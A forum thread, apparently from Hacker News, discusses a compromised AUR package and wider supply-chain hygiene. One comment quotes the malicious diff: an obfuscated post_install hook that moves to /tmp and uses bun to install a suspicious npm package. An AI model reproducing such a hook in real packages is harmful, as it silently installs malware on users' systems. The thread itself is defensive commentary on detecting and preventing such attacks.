- This is why I avoid AUR, it's too easy to become complacent. If I really want something from AUR I literally just look at the PKGBUILD for compilation instructions and do it manually by myself, but if it's got so many patches or dependencies that I can't go through them all by hand I just find another solution or do without.
This is also why I really dislike a lot of modern languages with automated fetching of dependencies. It really fosters a sloppy attitude toward your supply chain because it's just too damned convenient. With a reasonably sized Go project for instance, you may be pulling in code from dozens of different git repos. It only takes one compromised repo or malicious package to sink the ship.
- Is the nixpkgs repo more "resilient" to these kind of attacks since an attacker would need the approval of a member with merge permission ?
- Is there any information on if this is the same attack vector (orphaned packages that were adopted)? I believe they already locked down adoption, but maybe also a combination of existing maintainers being taken over?
- The reported commit [1] suggests to me that it was an account compromise of some sort, not orphan+adopt: the committer is the same in git, but the contact email changes in the PKGBUILD.
This doesn't necessarily seem 'more elaborate': it is attempting to be better obfuscated against automated checks at the cost of being very obvious to anyone doing even a cursory review of the install scripts. It's also likely something that would be caught instantly by even an extremely naive LLM, as seems to have been the case here. There's simply no legitimate reason why an install script would ever do something like this:
[1]: https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-b...diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install new file mode 100644 index 000000000000..9806501accad --- /dev/null +++ b/htbrowser-bin-deps.install @@ -0,0 +1,3 @@ +post_install() { + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' 'n'"e"'x'"t""f"'i''l''e''-''j''s' +}- I'm not certain that the git committer tells you the full story. I don't believe the AUR enforces that the git commit email is the same as the current maintainer email. So this could have been an orphan package, adopted by a malicious user, generated a malicious commit with the previous maintainer's git info.
Unfortunately, I don't see a way of viewing the ownership history of a package in the AUR. I know you get emails with ownership changes if you're subscribed to a package, but I don't see this info in the web interface anywhere.
- Companies like Anthropic and OpenAI need to sponsor open source projects by giving them free agent credits. Otherwise, bad actors can just outspend and totally overwhelm the somewhat dim and very overworked set of human maintainers. Humans in software are obsolete, full stop.
- Both already do that. The AUR stuff is more of a policy issue and unmatched expectations, unrelated to llms imo
- > The AUR stuff is more of a policy issue
Yes. This has happened before, a few times, before LLMs were even a thing. Via the same mechanism as well (someone else adopting an orphaned package). The big one I'm remembering was in 2018.
Outside of that mechanism though, anyone who uses the AUR regularly knowingly accepts this kind of risk. It's why I'm not a huge fan of distros (like Cachy, Endevaor, etc) that take Arch and package it up in a one-click easy installer with preinstalled AUR helpers. Cachy even uses the chaotic AUR too (auto build service for AUR packages to serve binaries). I like CachyOS, but good lord don't put in Yay + the AUR by default.
The ability for any registered user to just adopt an existing orphaned package is a problem (these attacks will always exist, but least force a fork & resubmission under a different name), and so is the use of automated AUR helpers that don't show PKGBUILD diffs.
The hygiene required to use the AUR is no different than the hygiene required to use pip, npm, cargo, etc. Anyone just blindly trusting user submitted packages and code from the internet is not operating with security in mind.
Adopt a policy of zero trust from any arbitrary code you download from the internet.
- Well, both give you 6 months of access. Out of interest I applied some time ago and (despite maintaining a few fairly important OSS projects) never got a response from them. Of the other maintainers I know, it seems to me that they decide who to give access to fairly randomly.
- Wonder how dependent it is on social following.
41 points by ImJamal 4 hours ago | 10 comments